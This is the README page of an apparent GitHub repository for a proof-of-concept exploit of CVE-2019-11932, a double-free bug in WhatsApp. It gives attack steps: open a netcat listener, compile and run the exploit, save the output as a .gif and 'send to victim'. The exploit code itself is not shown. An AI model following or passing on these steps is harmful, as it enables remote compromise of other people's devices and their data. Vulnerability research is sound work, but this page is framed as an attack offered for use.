Skip to content

tucommenceapousser/CVE-2019-11932

Repository files navigation

CVE-2019-11932

Double-Free BUG in WhatsApp exploit poc.

Usage

bash create.sh

clone on replit and run

Run on Replit

Manually

nc -lvp 5555 or whatever port.

and then compile.

gcc -o exp egif_lib.c exploit.c

then run

./exp

and save the content to .gif

and send to victim.

Releases

No releases published

Packages

No packages published

Languages